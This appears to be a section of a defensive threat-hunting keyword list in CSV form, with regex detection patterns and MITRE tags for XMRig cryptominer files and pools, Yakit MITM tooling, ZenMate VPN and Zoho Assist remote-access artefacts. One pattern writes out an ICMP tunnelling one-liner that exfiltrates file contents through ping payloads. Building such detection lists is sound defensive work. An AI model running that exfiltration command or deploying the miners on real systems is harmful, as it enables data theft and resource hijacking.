"*xmrig-*-gcc-win64.zip*",".{0,1000}xmrig\-.{0,1000}\-gcc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-linux-static-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-linux\-static\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-linux-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-linux\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-macos-arm64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-macos\-arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-macos-x64.tar.gz*",".{0,1000}xmrig\-.{0,1000}\-macos\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig-*-msvc-win64.zip*",".{0,1000}xmrig\-.{0,1000}\-msvc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig.exe -*",".{0,1000}xmrig\.exe\s\-.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrig.service*",".{0,1000}xmrig\.service.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*xmrig.tar.gz*",".{0,1000}xmrig\.tar\.gz.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrig.zip*",".{0,1000}xmrig\.zip.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrminer.cc*",".{0,1000}xmrminer\.cc.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrpool.de*",".{0,1000}xmrpool\.de.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrpool.eu*",".{0,1000}xmrpool\.eu.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrpool.eu:3333*",".{0,1000}xmrpool\.eu\:3333.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z"
"*xmrpool.me*",".{0,1000}xmrpool\.me.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrpool.net*",".{0,1000}xmrpool\.net.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xmrpool.xyz*",".{0,1000}xmrpool\.xyz.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","1","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z"
"*xxd -p -c 4 /* | while read line* do ping -c 1 -p *",".{0,1000}xxd\s\-p\s\-c\s4\s\/.{0,1000}\s\|\swhile\sread\sline.{0,1000}\sdo\sping\s\-c\s1\s\-p\s.{0,1000}","greyware_tool_keyword","xxd","ICMP Tunneling One Liner","T1090 - T1002 - T1016","TA0011 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"* set-proxy.ps1*",".{0,1000}\sset\-proxy\.ps1.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*""http://mitm""*",".{0,1000}\""http\:\/\/mitm\"".{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/MITMPluginLogViewer*",".{0,1000}\/MITMPluginLogViewer.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/MITMServerHijacking*",".{0,1000}\/MITMServerHijacking.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/set-proxy.ps1*",".{0,1000}\/set\-proxy\.ps1.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/yak_darwin_amd64.zip*",".{0,1000}\/yak_darwin_amd64\.zip.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/yak_linux_amd64.zip*",".{0,1000}\/yak_linux_amd64\.zip.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*/yak_windows_amd64.zip*",".{0,1000}\/yak_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*?? MITM ????*",".{0,1000}\?\?\sMITM\s\?\?\?\?.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\default-yakit.db*",".{0,1000}\\default\-yakit\.db.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\set-proxy.ps1*",".{0,1000}\\set\-proxy\.ps1.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\System32\yak.exe*",".{0,1000}\\System32\\yak\.exe.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*\yak.exe*",".{0,1000}\\yak\.exe.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*MITMServerHijacking/MITMPluginLocalList*",".{0,1000}MITMServerHijacking\/MITMPluginLocalList.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*pwd86u1qwZ9PWevKqm1A3yAw==*",".{0,1000}pwd86u1qwZ9PWevKqm1A3yAw\=\=.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*PwDaBjJzgufjES89Rs4Lpq63O300R/kOz30WCLo6BxxX6QVEilwSlpClnG5cZaikTA==*",".{0,1000}PwDaBjJzgufjES89Rs4Lpq63O300R\/kOz30WCLo6BxxX6QVEilwSlpClnG5cZaikTA\=\=.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","#base64","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*pWDkVEtllTAK5h6cnhxNxDA==*",".{0,1000}pWDkVEtllTAK5h6cnhxNxDA\=\=.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Yakit-*-windows-amd64.exe*",".{0,1000}Yakit\-.{0,1000}\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Yakit/1.0.0*",".{0,1000}Yakit\/1\.0\.0.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","1","N/A","user-agent","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*YAKIT_MITM*",".{0,1000}YAKIT_MITM.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*yakit-remote.json*",".{0,1000}yakit\-remote\.json.{0,1000}","greyware_tool_keyword","yakit","security platform with fuzzers - webshell and MITM (chinese burp)","T1557 - T1557.003 - T1569.002","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","7","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*fdcgdnkidjaadafnichfpabhfomcebme*",".{0,1000}fdcgdnkidjaadafnichfpabhfomcebme.{0,1000}","greyware_tool_keyword","ZenMate VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* -altgw *.zohoassist.com *",".{0,1000}\s\-altgw\s.{0,1000}\.zohoassist\.com\s.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -ms assist.zoho.com -p 443*",".{0,1000}\s\-ms\sassist\.zoho\.com\s\-p\s443.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -rr_flag * -group * -fileTransferGateways *.zohoassist.com -ADMINAGENT*",".{0,1000}\s\-rr_flag\s.{0,1000}\s\-group\s.{0,1000}\s\-fileTransferGateways\s.{0,1000}\.zohoassist\.com\s\-ADMINAGENT.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* SELECT ProcessId FROM Win32_Process * Name='ZAAudioClient.exe'*",".{0,1000}\sSELECT\sProcessId\sFROM\sWin32_Process\s.{0,1000}\sName\=\'ZAAudioClient\.exe\'.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ZA_Connect.exe*",".{0,1000}\sZA_Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ZAAudioClient.exe*",".{0,1000}\sZAAudioClient\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ZAFileTransfer.exe*",".{0,1000}\sZAFileTransfer\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ZAService.exe*",".{0,1000}\sZAService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.zohoassist.com.cn*",".{0,1000}\.zohoassist\.com\.cn.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.zohoassist.jp*",".{0,1000}\.zohoassist\.jp.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/ZA_Connect.exe*",".{0,1000}\/ZA_Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/ZAAudioClient.exe*",".{0,1000}\/ZAAudioClient\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/ZAFileTransfer.exe*",".{0,1000}\/ZAFileTransfer\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/ZAService.exe*",".{0,1000}\/ZAService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\ZohoMeeting\*",".{0,1000}\\AppData\\Local\\ZohoMeeting\\.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\Zoho Assist-Remote Support*",".{0,1000}\\CurrentControlSet\\Services\\Zoho\sAssist\-Remote\sSupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\dctoolshardware.exe*",".{0,1000}\\dctoolshardware\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\InventoryApplicationFile\zaservice.exe*",".{0,1000}\\InventoryApplicationFile\\zaservice\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\log\FileTransferWindowAppLog.log*",".{0,1000}\\log\\FileTransferWindowAppLog\.log.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Root\InventoryApplicationFile\za_connect.exe*",".{0,1000}\\Root\\InventoryApplicationFile\\za_connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RSTemp\ZohoMeeting\*",".{0,1000}\\RSTemp\\ZohoMeeting\\.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SafeBoot\Network\Zoho Assist-Remote Support*",".{0,1000}\\SafeBoot\\Network\\Zoho\sAssist\-Remote\sSupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Zoho Assist*",".{0,1000}\\SOFTWARE\\Zoho\sAssist.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZA_Connect.exe*",".{0,1000}\\ZA_Connect\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZA_Upgrader*",".{0,1000}\\ZA_Upgrader.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZAAudioClient.exe*",".{0,1000}\\ZAAudioClient\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZAFileTransfer.exe*",".{0,1000}\\ZAFileTransfer\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZAService.exe*",".{0,1000}\\ZAService\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZAudioClientPipe_*ServerReadPipe*",".{0,1000}\\ZAudioClientPipe_.{0,1000}ServerReadPipe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZAudioClientPipe_*ServerWritePipe*",".{0,1000}\\ZAudioClientPipe_.{0,1000}ServerWritePipe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZMAgent.exe*",".{0,1000}\\ZMAgent\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Zoho Assist\Zoho Assist Remote support*",".{0,1000}\\Zoho\sAssist\\Zoho\sAssist\sRemote\ssupport.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting.7z*",".{0,1000}\\ZohoMeeting\.7z.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ZohoMeeting.exe*",".{0,1000}\\ZohoMeeting\.exe.{0,1000}","greyware_tool_keyword","Zoho Assist","Zoho Assist Remote access software - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","LockBit - Scattered Spider*","RMM","https://www.zoho.com/assist/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
